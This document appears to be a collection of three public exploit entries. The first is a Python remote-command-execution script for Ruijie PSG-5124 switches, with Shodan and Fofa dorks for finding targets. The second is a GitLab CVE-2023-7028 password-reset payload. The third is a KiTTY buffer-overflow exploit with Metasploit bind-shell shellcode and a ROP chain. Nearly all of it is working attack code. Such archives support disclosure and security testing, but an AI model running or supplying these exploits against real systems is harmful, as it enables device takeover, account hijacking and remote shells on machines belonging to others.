#- Exploit Title: Ruijie Switch PSG-5124 26293 - Remote Code Execution (RCE) #- Shodan Dork: http.html_hash:-1402735717 #- Fofa Dork: body="img/free_login_ge.gif" && body="./img/login_bg.gif" #- Exploit Author: ByteHunter #- Email: [email protected] #- Version: PSG-5124(LINK SOFTWARE RELEASE:26293) #- Tested on: PSG-5124(LINK SOFTWARE RELEASE:26293) import http.client import argparse def send_request(ip, port, command): headers = { "Host": f"{ip}:{port}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate, br", "DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1", "Cmdnum": "1", "Confirm1": "n", "Content-Length": "0", "Command1": command } try: connection = http.client.HTTPConnection(f"{ip}:{port}") connection.request("GET", "/EXCU_SHELL", headers=headers) response = connection.getresponse() print(f"Status Code: {response.status}") print(response.read().decode('utf-8')) connection.close() except Exception as e: print(f"Request failed: {e}") if __name__ == "__main__": parser = argparse.ArgumentParser(description='proof of concept for ruijie Switches RCE') parser.add_argument('--ip', help='Target IP address', required=True) parser.add_argument('--port', help='Port', required=True) parser.add_argument('--cmd', help='Command', required=True) args = parser.parse_args() ip = args.ip port = args.port command = args.cmd send_request(ip, port, command)

# Exploit Title: GitLab CE/EE < 16.7.2 - Password Reset # Exploit Author: Sebastian Kriesten (0xB455) # Twitter: https://twitter.com/0xB455 # Date: 2024-01-12 # Vendor Homepage: gitlab.com # Vulnerability disclosure: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/ # Version: <16.7.2, <16.6.4, <16.5.6 # CVE: CVE-2023-7028 Proof of Concept: user[email][][email protected]&user[email][][email protected]

# Exploit Title: KiTTY 0.76.1.13 - 'Start Duplicated Session Hostname' Buffer Overflow # Exploit Author: DEFCESCO (Austin A. DeFrancesco) # Vendor Homepage: https://github.com/cyd01/KiTTY/= # Software Link: https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # Version: ≤ 0.76.1.13 # Tested on: Microsoft Windows 11/10/8/7/XP # CVE: 2024-25003 #-------------------------------------------------------------------------------------# # Blog: https://blog.DEFCESCO.io/Hell0+KiTTY #-------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > to_handler # # [*] Payload Handler Started as Job 1 # # msf6 payload(windows/shell_bind_tcp) > # # [*] Started bind TCP handler against 192.168.100.28:4444 # # [*] Command shell session 1 opened (192.168.100.119:39315 -> 192.168.100.28:4444) # #-------------------------------------------------------------------------------------# import sys import os import struct #---------------------------------------------------------------------------------------------# # msf6 payload(windows/shell_bind_tcp) > generate -b '\x00\x07\x0a\x0d\x1b\x9c\x3A\x40' -f py # # windows/shell_bind_tcp - 375 bytes # # https://metasploit.com/ # # Encoder: x86/xor_poly # # VERBOSE=false, LPORT=4444, RHOST=192.168.100.28, # # PrependMigrate=false, EXITFUNC=process, CreateSession=true, # # AutoVerifySession=true # #---------------------------------------------------------------------------------------------# buf = b"" buf += b"\x51\x53\x56\x57\xdb\xd9\xd9\x74\x24\xf4\x5f\x41" buf += b"\x49\x31\xc9\x51\x59\x90\x90\x81\xe9\xae\xff\xff" buf += b"\xff\xbe\xd4\xa1\xc4\xf4\x31\x77\x2b\x83\xef\xfc" buf += b"\x51\x59\x90\xff\xc9\x75\xf3\x5f\x5e\x5b\x59\x28" buf += b"\x49\x46\xf4\xd4\xa1\xa4\x7d\x31\x90\x04\x90\x5f" buf += b"\xf1\xf4\x7f\x86\xad\x4f\xa6\xc0\x2a\xb6\xdc\xdb" buf += b"\x16\x8e\xd2\xe5\x5e\x68\xc8\xb5\xdd\xc6\xd8\xf4" buf += b"\x60\x0b\xf9\xd5\x66\x26\x06\x86\xf6\x4f\xa6\xc4" buf += b"\x2a\x8e\xc8\x5f\xed\xd5\x8c\x37\xe9\xc5\x25\x85" buf += b"\x2a\x9d\xd4\xd5\x72\x4f\xbd\xcc\x42\xfe\xbd\x5f" buf += b"\x95\x4f\xf5\x02\x90\x3b\x58\x15\x6e\xc9\xf5\x13" buf += b"\x99\x24\x81\x22\xa2\xb9\x0c\xef\xdc\xe0\x81\x30" buf += b"\xf9\x4f\xac\xf0\xa0\x17\x92\x5f\xad\x8f\x7f\x8c" buf += b"\xbd\xc5\x27\x5f\xa5\x4f\xf5\x04\x28\x80\xd0\xf0" buf += b"\xfa\x9f\x95\x8d\xfb\x95\x0b\x34\xfe\x9b\xae\x5f" buf += b"\xb3\x2f\x79\x89\xc9\xf7\xc6\xd4\xa1\xac\x83\xa7" buf += b"\x93\x9b\xa0\xbc\xed\xb3\xd2\xd3\x5e\x11\x4c\x44" buf += b"\xa0\xc4\xf4\xfd\x65\x90\xa4\xbc\x88\x44\x9f\xd4" buf += b"\x5e\x11\x9e\xdc\xf8\x94\x16\x29\xe1\x94\xb4\x84" buf += b"\xc9\x2e\xfb\x0b\x41\x3b\x21\x43\xc9\xc6\xf4\xc5" buf += b"\xfd\x4d\x12\xbe\xb1\x92\xa3\xbc\x63\x1f\xc3\xb3" buf += b"\x5e\x11\xa3\xbc\x16\x2d\xcc\x2b\x5e\x11\xa3\xbc" buf += b"\xd5\x28\xcf\x35\x5e\x11\xa3\x43\xc9\xb1\x9a\x99" buf += b"\xc0\x3b\x21\xbc\xc2\xa9\x90\xd4\x28\x27\xa3\x83" buf += b"\xf6\xf5\x02\xbe\xb3\x9d\xa2\x36\x5c\xa2\x33\x90" buf += b"\x85\xf8\xf5\xd5\x2c\x80\xd0\xc4\x67\xc4\xb0\x80" buf += b"\xf1\x92\xa2\x82\xe7\x92\xba\x82\xf7\x97\xa2\xbc" buf += b"\xd8\x08\xcb\x52\x5e\x11\x7d\x34\xef\x92\xb2\x2b" buf += b"\x91\xac\xfc\x53\xbc\xa4\x0b\x01\x1a\x34\x41\x76" buf += b"\xf7\xac\x52\x41\x1c\x59\x0b\x01\x9d\xc2\x88\xde" buf += b"\x21\x3f\x14\xa1\xa4\x7f\xb3\xc7\xd3\xab\x9e\xd4" buf += b"\xf2\x3b\x21" def shellcode(): sc = b'' sc += b'\xBB\x44\x24\x44\x44' # mov ebx,0x44442444 sc += b'\xB8\x44\x44\x44\x44' # mov eax,0x44444444 sc += b'\x29\xD8' # sub eax,ebx sc += b'\x29\xC4' # sub esp,eax sc += buf sc += b'\x90' * (1052-len(sc)) assert len(sc) == 1052 return sc def create_rop_chain(): # rop chain generated with mona.py - www.corelan.be rop_gadgets = [ #[---INFO:gadgets_to_set_esi:---] 0x004c5832, # POP EAX # ADD ESP,14 # POP EBX # POP ESI # RETN [kitty.exe] 0x006424a4, # ptr to &VirtualProtect() [IAT kitty.exe] 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x41414141, # Filler (compensate) 0x00484e07, # MOV EAX,DWORD PTR DS:[EAX] # RETN [kitty.exe] 0x00473cf6, # XCHG EAX,ESI # RETN [kitty.exe] #[---INFO:gadgets_to_set_ebp:---] 0x00429953, # POP EBP # RETN [kitty.exe] 0x005405b0, # push esp; ret 0 [kitty.exe] #[---INFO:gadgets_to_set_ebx:---] 0x0049d9f9, # POP EBX # RETN [kitty.exe] 0x00000201, # 0x00000201-> ebx #[---INFO:gadgets_to_set_edx:---] 0x00430dce, # POP EDX # RETN [kitty.exe] 0x00000040, # 0x00000040-> edx #[---INFO:gadgets_to_set_ecx:---] 0x005ac58c, # POP ECX # RETN [kitty.exe] 0x004d81d9, # &Writable location [kitty.exe] #[---INFO:gadgets_to_set_edi:---] 0x004fa404, # POP EDI # RETN [kitty.exe] 0x005a2001, # RETN (ROP NOP) [kitty.exe] #[---INFO:gadgets_to_set_eax:---] 0x004cd011, # POP EAX # POP EBX # RETN [kitty.exe] 0x90909090, # nop 0x41414141, # Filler (compensate) #[---INFO:pushad:---] 0x005dfbac, # PUSHAD # RETN [kitty.exe] ] return b''.join(struct.pack('<I', _) for _ in rop_gadgets) rop_chain = create_rop_chain() #----------------------------------------------------------------------------------# # Badchars: \x00\x07\x0a\x0d\x1b\x9c\x3A\x40 # # Return Address Information: 0x0052033c : {pivot 332 / 0x14c} : # # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN # # ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE} # # Shellcode size at ESP: 1052 # #----------------------------------------------------------------------------------# return_address = struct.pack('<I', 0x0052033c) # ADD ESP,13C # POP EBX # POP ESI # POP EDI # POP EBP # RETN ** [kitty.exe] ** | startnull,ascii {PAGE_EXECUTE_READWRITE} rop_chain_padding = b'\x90' * 35 nops = b'\x90' * 88 escape_sequence = b'\033]0;__dt:' + shellcode() + return_address escape_sequence += rop_chain_padding + rop_chain escape_sequence += b'\x90' escape_sequence += b"\xE9\x2A\xFA\xFF\xFF" #jmp $eip-1490 escape_sequence += nops + b'\007' stdout = os.fdopen(sys.stdout.fileno(), 'wb') stdout.write(escape_sequence) stdout.flush()